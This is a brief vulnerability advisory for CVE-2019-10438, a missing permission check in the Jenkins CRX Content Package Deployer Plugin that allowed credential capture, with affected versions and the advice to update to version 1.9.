CVE-2019-10438

Name of the Vulnerable Software and Affected Versions Jenkins CRX Content Package Deployer Plugin versions 1.8.1 and earlier Jenkins CRX Content Package Deployer Plugin versions prior to 1.9

Description A missing permission check in the Jenkins CRX Content Package Deployer Plugin allowed attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Recommendations For versions 1.8.1 and earlier, update to version 1.9 or later to resolve the issue. For versions prior to 1.9, update to version 1.9 or later to resolve the issue. As a temporary workaround, consider restricting access to the plugin for users with only Overall/Read permission until a patch is applied.